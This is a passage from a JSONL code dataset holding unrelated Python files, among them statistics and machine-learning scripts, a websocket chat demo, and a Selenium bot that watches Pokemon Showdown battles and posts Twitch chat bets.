branch.\")","sub_path":"chris.py","file_name":"chris.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240713322","text":"import math\nimport random\nimport statistics\nimport numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\n\ndef main():\n N = 1_000_000\n MEAN = 100\n sigma = 12\n Z1 = 1.96\n Z2 = 2.58\n\n population = np.random.normal(MEAN, sigma, N)\n # print(type(population))\n\n populationList = population.tolist()\n\n meanList = []\n posInList = []\n negaInList = []\n posInList99 = []\n negaInList99 = []\n n_value = []\n\n #n = random.randint(1, 100)\n for n in range(1, 201):\n n_value.append(n)\n sample = random.sample(populationList, n)\n sample_mean = statistics.mean(sample)\n meanList.append(sample_mean)\n\n #Calculate the confidence interval of 95\n interList = calInterval(MEAN, sigma, n, 95)\n #Add the positive and negative interval to approriate list\n posInList.append(interList[0])\n negaInList.append(interList[1])\n\n #Calculate the confidence interval of 99\n interList99 = calInterval(MEAN, sigma, n, 99)\n #Add the positive and negative interval to approriate list\n posInList99.append(interList99[0])\n negaInList99.append(interList99[1])\n\n #print(\"Mean: \", mean)\n print(\"Meanlist: \", meanList)\n print(\"MeanList size: \", len(meanList))\n print(\"PosList: \", posInList)\n print(\"PosList len: \", len(posInList))\n print(\"NegaList: \", negaInList)\n print(\"NegaList len: \", len(negaInList))\n print(\"n value: \", n_value)\n\n #95 confidence graph\n figure1 = plt.figure(1)\n plt.plot(n_value, meanList, linestyle=' ', marker=\"x\")\n plt.plot(n_value, posInList, 'r', linestyle='--')\n plt.plot(n_value, negaInList, 'r', linestyle='--')\n plt.axhline(y=100, color=\"black\")\n plt.xlabel(\"Sample sizes\")\n plt.ylabel(\"x_bar\")\n plt.title(\"Sample means and 95% confidence intervals\")\n\n #99 confidence graph\n figure2 = plt.figure(2)\n plt.plot(n_value, meanList, linestyle=' ', marker=\"x\")\n plt.plot(n_value, posInList99, 'g', linestyle=':')\n plt.plot(n_value, negaInList99, 'g', linestyle=':')\n plt.axhline(y=100, color=\"black\")\n plt.xlabel(\"Sample sizes\")\n plt.ylabel(\"x_bar\")\n plt.title(\"Sample means and 99% confidence intervals\")\n\n plt.show()\n\n print(\"n: \", n)\n print(\"sample: \", sample)\n #\n # print(population)\n # print(\"Size: \", population.size)\n # print(\"list: \", populationList)\n # print(\"Size: \", len(populationList))\n\ndef calInterval(mean, sigma, sample_size, con_level):\n interval = []\n if (con_level == 95):\n result = mean + 1.96 * (sigma / math.sqrt(sample_size))\n resultNegative = mean - 1.96 * (sigma / math.sqrt(sample_size))\n interval.append(result)\n interval.append(resultNegative)\n elif (con_level == 99):\n result = mean + 2.58 * (sigma / math.sqrt(sample_size))\n resultNegative = mean - 2.58 * (sigma / math.sqrt(sample_size))\n interval.append(result)\n interval.append(resultNegative)\n return interval\nmain()","sub_path":"lab5/lab5Q1.py","file_name":"lab5Q1.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277968431","text":"def search(main_dir):\n # import command line packages\n import os\n\n # import time package\n import time\n \n # search through each note file\n # if there is a match, then copy the filename and the note\n search_loop = True\n while search_loop:\n # collect the search term or phrase\n find = input('\\nEnter in the term or phrase you would like to search for:\\n\\n')\n\n print('\\nSearching. . .')\n main_dir_list = next(os.walk('%s' %main_dir))[1]\n main_dir_list.remove('z_scripts')\n for top_level_dir in main_dir_list: #main dir\n if top_level_dir != 'settings':\n proj_dir_list = next(os.walk('%s/%s' %(main_dir, top_level_dir)))[1]\n for proj_level_dir in proj_dir_list: #project dir\n task_dir_list = next(os.walk('%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir)))[1]\n for task_level_dir in task_dir_list: #task dir\n note_dir_list = next(os.walk('%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir)))[1]\n for note_level_dir in note_dir_list: #note dir\n low_level_list = next(os.walk('%s/%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir, note_level_dir)))[2]\n for low_level_dir in low_level_list:\n # read in the file\n taskfile = open('%s/%s/%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir, note_level_dir, low_level_dir), 'r')\n taskfile = taskfile.read()\n\n # if the search terms match, copy it to the command line\n if find in taskfile:\n print('\\n--------------------\\n%s\\n--------------------\\n%s\\n\\n' %(task_level_dir.upper, taskfile))\n \n time.sleep(.1)\n \n #do another search?\n keep_searching_loop = True\n while keep_searching_loop:\n keep_searching = input('\\n\\nWould you like to do another search? (y/n): ')\n if (keep_searching == 'y') or (keep_searching == ''):\n keep_searching_loop = False\n elif keep_searching == 'n':\n search_loop = False\n keep_searching_loop = False\n else: #wtf\n print('\\nWait, that don\\'t make no sense! Try again.\\n')","sub_path":"z_scripts/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638909060","text":"import logging\nlogging.disable(logging.CRITICAL)\n\nfrom tabulate import tabulate\nfrom mjrl.utils.make_train_plots import make_train_plots\nfrom mjrl.utils.gym_env import GymEnv\nfrom mjrl.samplers.core import sample_paths\nimport numpy as np\nimport pickle\nimport time as timer\nimport os\nimport copy\n\ndef train_agent(job_name, agent,\n seed = 0,\n niter = 101,\n gamma = 0.995,\n gae_lambda = None,\n num_cpu = 1,\n sample_mode = 'trajectories',\n num_traj = 50,\n num_samples = 50000, # has precedence, used with sample_mode = 'samples'\n save_freq = 10,\n evaluation_rollouts = None,\n plot_keys = ['stoc_pol_mean'],\n ):\n\n np.random.seed(seed)\n if os.path.isdir(job_name) == False:\n os.mkdir(job_name)\n previous_dir = os.getcwd()\n os.chdir(job_name) # important! we are now in the directory to save data\n if os.path.isdir('iterations') == False: os.mkdir('iterations')\n if os.path.isdir('logs') == False and agent.save_logs == True: os.mkdir('logs')\n best_policy = copy.deepcopy(agent.policy)\n best_perf = -1e8\n train_curve = best_perf*np.ones(niter)\n mean_pol_perf = 0.0\n e = GymEnv(agent.env.env_id)\n\n for i in range(niter):\n print(\"......................................................................................\")\n print(\"ITERATION : %i \" % i)\n\n if train_curve[i-1] > best_perf:\n best_policy = copy.deepcopy(agent.policy)\n best_perf = train_curve[i-1]\n\n N = num_traj if sample_mode == 'trajectories' else num_samples\n args = dict(N=N, sample_mode=sample_mode, gamma=gamma, gae_lambda=gae_lambda, num_cpu=num_cpu)\n stats = agent.train_step(**args)\n train_curve[i] = stats[0]\n\n if evaluation_rollouts is not None and evaluation_rollouts > 0:\n print(\"Performing evaluation rollouts ........\")\n eval_paths = sample_paths(num_traj=evaluation_rollouts, policy=agent.policy, num_cpu=num_cpu,\n env=e.env_id, eval_mode=True, base_seed=seed)\n mean_pol_perf = np.mean([np.sum(path['rewards']) for path in eval_paths])\n if agent.save_logs:\n agent.logger.log_kv('eval_score', mean_pol_perf)\n\n if i % save_freq == 0 and i > 0:\n if agent.save_logs:\n agent.logger.save_log('logs/')\n make_train_plots(log=agent.logger.log, keys=plot_keys, save_loc='logs/')\n policy_file = 'policy_%i.pickle' % i\n baseline_file = 'baseline_%i.pickle' % i\n pickle.dump(agent.policy, open('iterations/' + policy_file, 'wb'))\n pickle.dump(agent.baseline, open('iterations/' + baseline_file, 'wb'))\n pickle.dump(best_policy, open('iterations/best_policy.pickle', 'wb'))\n\n # print results to console\n if i == 0:\n result_file = open('results.txt', 'w')\n print(\"Iter | Stoc Pol | Mean Pol | Best (Stoc) \\n\")\n result_file.write(\"Iter | Sampling Pol | Evaluation Pol | Best (Sampled) \\n\")\n result_file.close()\n print(\"[ %s ] %4i %5.2f %5.2f %5.2f \" % (timer.asctime(timer.localtime(timer.time())),\n i, train_curve[i], mean_pol_perf, best_perf))\n result_file = open('results.txt', 'a')\n result_file.write(\"%4i %5.2f %5.2f %5.2f \\n\" % (i, train_curve[i], mean_pol_perf, best_perf))\n result_file.close()\n if agent.save_logs:\n print_data = sorted(filter(lambda v: np.asarray(v[1]).size == 1,\n agent.logger.get_current_log().items()))\n print(tabulate(print_data))\n\n # final save\n pickle.dump(best_policy, open('iterations/best_policy.pickle', 'wb'))\n if agent.save_logs:\n agent.logger.save_log('logs/')\n make_train_plots(log=agent.logger.log, keys=plot_keys, save_loc='logs/')\n os.chdir(previous_dir)\n","sub_path":"mjrl/utils/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565201202","text":"import sys, os\n\nimport itertools\nimport numpy as np\nimport scipy.optimize\nimport matplotlib.pyplot as plt\n\nimport cartopy.crs as ccrs\n\nimport pymc\nfrom pymc.utils import hpd\n\nplt.style.use('../bpr.mplstyle')\n\nsys.path.insert(1, os.path.abspath('../../mcplates'))\nimport mcplates\nfrom mcplates.plot import cmap_red, cmap_green\n\ndbname = 'two_euler_poles'\nn_euler_poles=2\n\n# Generate a synthetic data set\nages = [260., 195., 130., 65., 0.]\nstart_age = 260.\nhidden_start_pole = [-60., 0.]\nhidden_euler_poles = [ [-60., 41.], [60., 41.] ]\nhidden_euler_rates = [1., 1.]\nhidden_changepoint = 130.\n#Make a dummy APW path to create the synthetic data\ndummy_pole_position_fn = mcplates.APWPath.generate_pole_position_fn( n_euler_poles, start_age)\npole_list = []\nfor a in ages:\n lon_lat = dummy_pole_position_fn(hidden_start_pole, a, 0.0, 0.0,\n hidden_euler_poles[0], hidden_euler_poles[1],\n hidden_euler_rates[0], hidden_euler_rates[1], hidden_changepoint)\n pole_list.append( mcplates.PaleomagneticPole( lon_lat[0], lon_lat[1], angular_error = 10., age=a, sigma_age = 0.01))\n\npath = mcplates.APWPath( dbname, pole_list, n_euler_poles)\npath.create_model(watson_concentration=0.0, rate_scale=2.5)\n\n\ndef plot_result():\n\n fig = plt.figure( figsize=(8,4) )\n ax = fig.add_subplot(1,2,1, projection = ccrs.Orthographic(0.,30.))\n #ax = fig.add_subplot(1,2,1, projection = ccrs.Mollweide(0.))\n ax.gridlines()\n ax.set_global()\n\n colors = itertools.cycle([cmap_red, cmap_green])\n direction_samples = path.euler_directions()\n for directions in direction_samples:\n mcplates.plot.plot_distribution( ax, directions[:,0], directions[:,1], resolution=60, cmap=next(colors))\n for hidden_euler_pole in hidden_euler_poles:\n euler_lon = hidden_euler_pole[0]\n euler_lat = hidden_euler_pole[1]\n ax.plot(euler_lon,euler_lat, 'k*', transform=ccrs.Geodetic(), markersize=10)\n\n n_paths=100\n interval = max(1, int(len(path.mcmc.db.trace('rate_0')[:]) / n_paths))\n pathlons, pathlats = path.compute_synthetic_paths(n=n_paths)\n changepoints = path.changepoints()[0][::interval]\n for pathlon,pathlat,change in zip(pathlons,pathlats,changepoints):\n switch = int(float(len(pathlon))*change/(max(ages)-min(ages)))\n ax.plot(pathlon[:switch],pathlat[:switch], transform=ccrs.PlateCarree(), color='darkred', alpha=0.05 )\n ax.plot(pathlon[switch:],pathlat[switch:], transform=ccrs.PlateCarree(), color='darkgreen', alpha=0.05 )\n\n for p in pole_list:\n p.plot(ax)\n ax.set_title('(a)')\n\n ax = fig.add_subplot(1,2,2)\n rate_samples = path.euler_rates()\n\n c = 'darkred'\n ax.hist(rate_samples[0], bins=15, normed=True, edgecolor='none', color=c, alpha=0.5)\n # plot median, credible interval\n credible_interval = hpd(rate_samples[0], 0.05)\n median = np.median(rate_samples)\n print(\"Rotation 0: median %f, credible interval \"%(median), credible_interval)\n ax.axvline( median, lw=2, color=c )\n ax.axvline( credible_interval[0], lw=2, color=c, linestyle='dashed')\n ax.axvline( credible_interval[1], lw=2, color=c, linestyle='dashed')\n ax.axvline( hidden_euler_rates[0], lw=2, color='black', linestyle='dotted')\n\n c = 'darkgreen'\n ax.hist(rate_samples[1], bins=15, normed=True, edgecolor='none', color=c, alpha=0.5)\n # plot median, credible interval\n credible_interval = hpd(rate_samples[1], 0.05)\n median = np.median(rate_samples)\n print(\"Rotation 1: median %f, credible interval \"%(median), credible_interval)\n ax.axvline( median, lw=2, color=c )\n ax.axvline( credible_interval[0], lw=2, color=c, linestyle='dashed')\n ax.axvline( credible_interval[1], lw=2, color=c, linestyle='dashed')\n ax.axvline( hidden_euler_rates[1], lw=2, color='black', linestyle='dotted')\n\n ax.set_title('(b)')\n ax.set_xlabel(r'Rotation rate $\\,^\\circ / \\mathrm{Myr}$')\n ax.set_ylabel(r'Posterior probability density')\n plt.tight_layout()\n plt.savefig(\"two_euler_poles.pdf\")\n #plt.show()\n\nif __name__ == \"__main__\":\n import os\n if os.path.isfile(dbname+'.pickle'):\n path.load_mcmc()\n else:\n path.sample_mcmc(100000)\n plot_result()\n","sub_path":"figures/synthetic/invert_two_euler_poles.py","file_name":"invert_two_euler_poles.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"81086943","text":"def cipher(target):\n result = \"\"\n for c in target:\n if target.islower():\n result += chr(219 - ord(c))\n else:\n result += c\n\n return result\n\ntarget = input(\"任意の文字列を入力してください--> \")\n\nencryption = cipher(target)\nprint(\"暗号化:\" + encryption)\n\ndecryption = cipher(encryption)\nprint(\"復号化:\" + decryption)\n","sub_path":"000-009/008.py","file_name":"008.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89135314","text":"# -*- coding: utf-8 -*-\n\nimport uuid\nimport uvloop\nimport asyncio\nfrom roll import Roll, Response\nfrom roll.extensions import logger, simple_server, traceback\n\n\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n\n\nclass HTMLResponse(Response):\n\n def html(self, body):\n self.headers['Content-Type'] = 'plain/text'\n self.body = body\n\n \nclass Application(Roll):\n Response = HTMLResponse\n\n\napp = Application()\n#logger(app)\n#traceback(app)\n\n\n@app.route('/')\nasync def hello(request, response):\n response.html('Hello World !')\n\n\n@app.route('/chat', protocol=\"websocket\")\nasync def broadcast(request, ws, **params):\n wsid = str(uuid.uuid4())\n await ws.send(f'Welcome {wsid} !')\n async for message in ws:\n for (task, socket) in request.app['websockets']:\n if socket != ws:\n await socket.send('{}: {}'.format(wsid, message))\n \n\nif __name__ == '__main__':\n simple_server(app)\n","sub_path":"ws_examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497235461","text":"\"\"\"\nЛегкий способ многопараметрической сортировки\nв задаче B\n\"\"\"\n\nWORDS = [\"три\",\"четыре\", \"пять\", \"шесть\", \"два\", \"один\"]\n #[\"два\" , \"три\", \"один\", \"пять\", \"шесть\", \"четыре\"]\n\n\ndef main():\n \"\"\"\n Входная точка\n \"\"\"\n print(sorted(WORDS, key=lambda elem: (len(elem), elem)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"day2/Lect6/pre_solve_b.py","file_name":"pre_solve_b.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"508352803","text":"import tensorflow as tf\nimport tensorflow.python.keras.losses as tfloss\nfrom tensorflow.keras import layers, models\nimport tensorflow_addons as tfa\n\n\nclass Densenet169:\n def __init__(self, data, modelRoute=''):\n self.x_train, self.x_valid, self.x_test, self.y_train, self.y_valid, self.y_test = data\n self.modelRoute = modelRoute\n\n def Train(self, pre_weights, activation, learning_rate, momentum, weight_decay, batch_size, epochs, nclasses, early_stop, save_model):\n\n model = tf.keras.applications.DenseNet169(weights=pre_weights, include_top=False,\n input_shape=(self.x_train.shape[1], self.x_train.shape[2], 3),\n pooling='avg')\n\n out = layers.Dense(nclasses, activation=activation)(model.output)\n\n full_model = models.Model(inputs=model.input, outputs=out)\n\n if weight_decay is None:\n opt = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum, nesterov=True)\n else:\n opt = tfa.optimizers.SGDW(weight_decay=weight_decay, learning_rate=learning_rate, momentum=momentum,\n nesterov=True)\n\n if nclasses == 2:\n loss = tfloss.BinaryCrossentropy(from_logits=False)\n else:\n loss = tf.keras.losses.CategoricalCrossentropy(from_logits=False)\n\n callbacks = self.SetCallbacks(early_stop, save_model)\n\n full_model.compile(optimizer=opt, loss=loss, metrics=['accuracy'])\n\n if nclasses == 2:\n class_weights = {0: len(self.y_train[self.y_train[:, 1] == 1]) / len(self.y_train),\n 1: len(self.y_train[self.y_train[:, 0] == 1]) / len(self.y_train)}\n elif nclasses == 4:\n\n N1 = len(self.y_train[self.y_train[:, 0] == 1])\n N2 = len(self.y_train[self.y_train[:, 1] == 1])\n N3 = len(self.y_train[self.y_train[:, 2] == 1])\n N4 = len(self.y_train[self.y_train[:, 3] == 1])\n NT = 1 / (1 / N1 + 1 / N2 + 1 / N3 + 1 / N4)\n\n class_weights = {0: 1 / N1 * NT,\n 1: 1 / N2 * NT,\n 2: 1 / N3 * NT,\n 3: 1 / N4 * NT, }\n\n history = full_model.fit(x=self.x_train, y=self.y_train, batch_size=batch_size, epochs=epochs, verbose=1,\n callbacks=callbacks, validation_data=(self.x_valid, self.y_valid),\n shuffle=True, class_weight=class_weights, sample_weight=None, initial_epoch=0,\n steps_per_epoch=None, validation_steps=None, validation_batch_size=None,\n validation_freq=1, max_queue_size=10, workers=1, use_multiprocessing=False)\n\n return full_model, history\n\n def SetCallbacks(self, early_stop, save_model):\n stopper = None\n mcp_save = None\n\n if early_stop:\n stopper = tf.keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.0001, patience=6, verbose=0,\n mode='auto', baseline=None, restore_best_weights=False)\n\n if save_model:\n mcp_save = tf.keras.callbacks.ModelCheckpoint(self.modelRoute + 'trained_model.h5',\n save_best_only=True, monitor='val_loss', mode='min')\n\n if (stopper is not None) and (mcp_save is not None):\n return [stopper, mcp_save]\n elif stopper is not None:\n return stopper\n elif mcp_save is not None:\n return mcp_save\n else:\n return None\n","sub_path":"src/ModelAlgorithms/Densenet169.py","file_name":"Densenet169.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612487807","text":"from tqdm import tqdm\n\nfrom src.architecture import Architecture\nfrom src.common_paths import get_tensorboard_logs_path\nfrom src.data_tools import *\nfrom src.data_tools import preprocess_data\nfrom src.tensorflow_utilities import start_tensorflow_session, get_summary_writer\n\npd.options.display.max_columns = 100\n\ndf, data_cube = preprocess_data()\n\n# Cardinalities\ncardinalities = {\"date\": 1684+1,\n \"store_nbr\": 54+1,\n \"item_nbr\": 4100+1,\n \"item_family\": 33+1,\n \"item_class\": 337+1,\n \"city\": 22+1,\n \"state\": 16+1,\n \"store_type\": 5+1,\n \"store_cluster\": 17+1,\n \"holiday_type\": 7}\n\nembedding_sizes = {\"store_nbr\": 30,\n \"item_nbr\": 100,\n \"item_family\": 5,\n \"item_class\": 10,\n \"city\": 5,\n \"state\": 5,\n \"store_type\": 3,\n \"store_cluster\": 5,\n \"national_holiday_type\": 3,\n \"holiday_type\": 3}\n\n\nnet = Architecture(n_timesteps_past=n_dates-15, n_timesteps_future=15, cardinalities=cardinalities,\n embedding_sizes=embedding_sizes, name=\"cf\")\n\nsess = start_tensorflow_session(\"0\")\nsess.run(tf.global_variables_initializer())\nsw = get_summary_writer(sess, get_tensorboard_logs_path(), \"CFavorita\", \"V2\")\n\nbatch_size=64\nc=0\n\nfor epoch in range(1000):\n # TRAIN:\n batcher = get_batcher(data_cube[:160000], batch_size)\n for _batch, params in tqdm(batcher):\n fd = {}\n for key, value in _batch.items():\n fd[getattr(net.placeholders, key)] = value\n\n _, s = sess.run([net.op.op, net.summaries.scalar_train_performance],\n feed_dict=fd)\n sw.add_summary(s, c)\n c += 1\n\n # DEV:\n batcher = get_batcher(data_cube[160000:], batch_size)\n lsd = []\n for _batch, params in batcher:\n fd = {}\n for key, value in _batch.items():\n fd[getattr(net.placeholders, key)] = value\n\n lsd.append(sess.run([net.losses.loss], feed_dict=fd))\n lsd = np.mean(lsd)\n\n s = sess.run(net.summ.scalar_dev_performance, feed_dict={net.ph.loss_dev: lsd})\n sw.add_summary(s, c)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"418536400","text":"# # `pokemon-showdown.py`\n# Automated bot which spectates random Pokemon Showdown matches and coordinates a `twitch_chat_bot` to manage bets on the winners within a configured account/channel. \n#\n# ## Dependencies\n\n# +\nfrom selenium import webdriver\nimport time\nfrom get_names import getNames, getWinner\nfrom twitch_connect import twitch_chat_bot\n\n# start twitch_chat_bot - credentials/channel specified in `twitch_connect.py`\ntwitch_handler = twitch_chat_bot()\n\n# start webdriver, navigate to showdown and have window take fullscreen\ndriver = webdriver.Firefox()\ndriver.get(\"https://play.pokemonshowdown.com/\")\ndriver.maximize_window()\n# -\n\n# ## Main Loop\n\nwhile True:\n \n # refresh page\n driver.refresh()\n print(\"After refresh\")\n \n # open list of active battles\n view_battle_button = driver.find_element_by_xpath('//*[@id=\"room-\"]/div/div[1]/div[2]/div[3]/p[1]/button')\n view_battle_button.click()\n driver.implicitly_wait(10)\n print('view_battle_button 1 clicked')\n \n # select first active battle listed\n refresh_button = driver.find_element_by_xpath('//*[@id=\"room-battles\"]/div/div/div/div[1]/a')\n refresh_button.click()\n driver.implicitly_wait(10)\n \n # reset battle playback to the first move\n driver.find_element_by_name(\"instantReplay\")\n start_of_battle_button.click()\n driver.implicitly_wait(10)\n print('after wait')\n \n # extract player names from battle log\n battle_log = driver.find_element_by_class_name(\"battle-log\").text\n left_name, right_name = getNames(battle_log)\n \n # Post bet & options to twitch chat\n twitch_handler.post_msg('!bet open \"Who will win?\" \"' + left_name + \", \" + right_name + '\" 1 1000 2')\n \n # loop until battle ends\n battle_over, bets_open = False, True\n while not battle_over:\n \n # wait twenty seconds\n time.sleep(20)\n \n # bets aren't open by start of turn 3 (but this variable doesn't seem to do anything yet?)\n battle_log = driver.find_element_by_class_name(\"battle-log\").text\n if \"Turn 3\" in battle_log and bets_open:\n bets_open = False\n \n # report winner and close bets to Twitch Channel\n if (\"won the battle!\" or \"This room is expired\" or \"All players are inactive.\" or \"Tie between\") in battle_log:\n battle_over = True\n winner = getWinner(battle_log)\n print(battle_log)\n print(\"winner\")\n print(winner)\n twitch_handler.post_msg(\"!bet close \" + winner)\n \n # 10 seconds after bets close, exit battle and loop\n time.sleep(10)\n attempts = 0\n while attempts < 3:\n try:\n close_battle_button = driver.find_element_by_name(\"closeRoom\")\n close_battle_button.click()\n print(\"Close button clicked\")\n break\n except:\n print(\"Caught stale exception\")\n driver.refresh()\n attempts = attempts + 1\n\n # return to and refresh battle list\n time.sleep(5)\n view_battle_button = driver.find_element_by_xpath('//*[@id=\"room-\"]/div/div[1]/div[2]/div[3]/p[1]/button')\n view_battle_button.click()\n print('view battle button 2 clicked')\n \n driver.implicitly_wait(10)\n refresh_button = driver.find_element_by_name(\"refresh\")\n refresh_button.click()\n print(\"Refresh button clicked\")\n driver.implicitly_wait(10)\n","sub_path":"pokemon-showdown.py","file_name":"pokemon-showdown.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176616615","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# constants\nPROBLEMS = [\"Air Cargo Problem 1\",\n \"Air Cargo Problem 2\",\n \"Air Cargo Problem 3\",\n \"Air Cargo Problem 4\"]\nSEARCHES = [\"breadth_first_search\", \n 'depth_first_graph_search', \n 'uniform_cost_search',\n 'greedy_best_first_graph_search-h_unmet_goals',\n 'greedy_best_first_graph_search-h_pg_levelsum',\n 'greedy_best_first_graph_search-h_pg_maxlevel',\n 'greedy_best_first_graph_search-h_pg_setlevel',\n 'astar_search-h_unmet_goals',\n 'astar_search-h_pg_levelsum',\n 'astar_search-h_pg_maxlevel',\n 'astar_search-h_pg_setlevel'\n ]\n\n\n# load data frame\ndf_search= pd.DataFrame()\ndf_search[\"AlgName\"]= SEARCHES\ndf_search[\"Alg\"]= [i+1 for i in range(11)]\ndf= pd.read_csv(\"Summary.csv\")\n\n\ndf_all= df.merge(df_search, left_on='Alg', right_on='Alg', how= 'outer')\ndf_all= df_all.sort_values([\"Problem\",\"Alg\"])\n\n\n#%% Nodes vs Actions\ndfs= df.sort_values(by=[\"Actions\"])\nplt.figure()\nplt.plot(dfs.Actions, dfs.NewNodes, 'o')\nplt.xlabel(\"Number of Actions\")\nplt.ylabel(\"Number of New Nodes\")\n\n\nboxplot= df.boxplot(column=[\"NewNodes\"], by=[\"Actions\"])\n\n\nsns.catplot(x=\"Actions\", y=\"NewNodes\", hue=\"Alg\", kind=\"point\", data=df)\n\n#%% Time vs Number of Actions\nplt.figure()\nplt.plot(df.Actions, df.ElapsedTime, 'o')\nplt.xlabel(\"Number of Actions\")\nplt.ylabel(\"Elapsed Time\")\n\n\nboxplot= df.boxplot(column=[\"ElapsedTime\"], by=[\"Actions\"])\n\n\nsns.catplot(x=\"Actions\", y=\"ElapsedTime\", hue=\"Alg\", kind=\"point\", data=df)\n\n#%% Length of Plans\nsns.catplot(x=\"AlgName\", y=\"PlanLength\", hue=\"Problem\", data=df_all, kind='bar')\nplt.xticks(rotation=75, fontsize= 10)\nplt.xlabel(\"Algorithm\")\nplt.ylabel(\"Plan Length\")\nax= plt.gca()\nax.set_position([0.1, 0.4, 0.8, 0.55])\n\nsns.catplot(x=\"Problem\", y=\"PlanLength\", hue=\"AlgName\", data=df_all, kind='bar')\nplt.xlabel(\"Problem\")\nplt.ylabel(\"Plan Length\")\n\n","sub_path":"Projects/2_Classical Planning/result_plotting.py","file_name":"result_plotting.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"243593476","text":"# Calcular média de aluno:\nnota_1 = float(input('Digite a primeira nota:'))\nnota_2 = float(input('Digite a segunda nota:'))\nmedia = (nota_1 + nota_2)/2\nif media >= 7:\n print(f'Aluno aprovado com nota: {media}')\nelif 5 < media < 7:\n print(f'Aluno em exame com nota: {media}')\nelse:\n print(f'Aluno reprovado com nota: {media}')\n","sub_path":"List/calculo_medias.py","file_name":"calculo_medias.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582823702","text":"import sys\nimport os\nimport argparse\nimport logging\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.keras.callbacks import TensorBoard\nfrom tensorflow.keras.utils import to_categorical, plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Dense, Flatten, Activation, Dropout, Conv2D, MaxPooling2D, UpSampling2D\nimport nni\nsys.path.insert(0, '/headless/shared/AudioNER/')\n\nimport constants as const\nfrom load_data import get_test_and_train_data\n\n\nLOG = logging.getLogger('deep_conv__for_noise2x_data_model_keras')\nTENSORBOARD_DIR = os.environ['NNI_OUTPUT_DIR']\n\n\ndef load_dataset(dataset_name, part_train):\n print('Load data...')\n X_train, Y1_train, Y2_train, X_test, Y1_test, Y2_test = get_test_and_train_data(dataset_name, part_train)\n print('%d train samples were loaded', len(X_train))\n print('%d test samples were loaded', len(X_test))\n X_train = (np.array(X_train)).reshape(len(X_train), const.HEIGHT, const.LENGTH, 1)\n X_test = (np.array(X_test)).reshape(len(X_test), const.HEIGHT, const.LENGTH, 1)\n Y1_train = to_categorical(Y1_train, const.N_CLASSES)\n Y1_test = to_categorical(Y1_test, const.N_CLASSES)\n Y2_train = to_categorical(Y2_train, const.N_SUBCLASSES)\n Y2_test = to_categorical(Y2_test, const.N_SUBCLASSES)\n return X_train, Y1_train, Y2_train, X_test, Y1_test, Y2_test\n\n\ndef build_model(hyper_params, input_shape=(const.HEIGHT, const.LENGTH, 1), num_classes=const.N_CLASSES, num_subclasses=const.N_SUBCLASSES):\n print('Building model...')\n #input layer\n visible = Input(shape=input_shape)\n conv0 = Conv2D(hyper_params['conv0_size'], kernel_size=(8, 10), use_bias=True, padding='same', activation='relu')(visible)\n\n #classification layers\n pool1 = MaxPooling2D((2, 2), padding='same')(conv0)\n conv1 = Conv2D(hyper_params['conv1_size'], kernel_size=(4, 10), use_bias=True, padding='same', activation='relu')(pool1)\n pool2 = MaxPooling2D((2, 2), padding='same')(conv1)\n conv2 = Conv2D(hyper_params['conv2_size'], kernel_size=(2, 5), use_bias=True, padding='same', activation='relu')(pool2)\n pool3 = MaxPooling2D((2, 2), padding='same')(conv2)\n conv3 = Conv2D(hyper_params['conv3_size'], kernel_size=(1, 1), use_bias=True, padding='same', activation='relu')(pool3)\n pool4 = MaxPooling2D((2, 2), padding='same')(conv3)\n\n flatten = Flatten()(pool4)\n\n classes_output = Dense(num_classes, activation='softmax')(flatten)\n\n # subclasses_output\n dense1 = Dense(hyper_params['dense_size'], activation='relu')(flatten)\n subclasses_output = Dense(num_subclasses, activation='softmax')(dense1)\n\n model = Model(inputs=visible, outputs=[classes_output, subclasses_output])\n\n # summarize layers\n print(model.summary())\n\n # plot graph\n #plot_model(model, to_file='multiple_outputs.png')\n\n if hyper_params['optimizer'] == 'Adam':\n optimizer = keras.optimizers.Adam(lr=hyper_params['learning_rate'])\n else:\n optimizer = 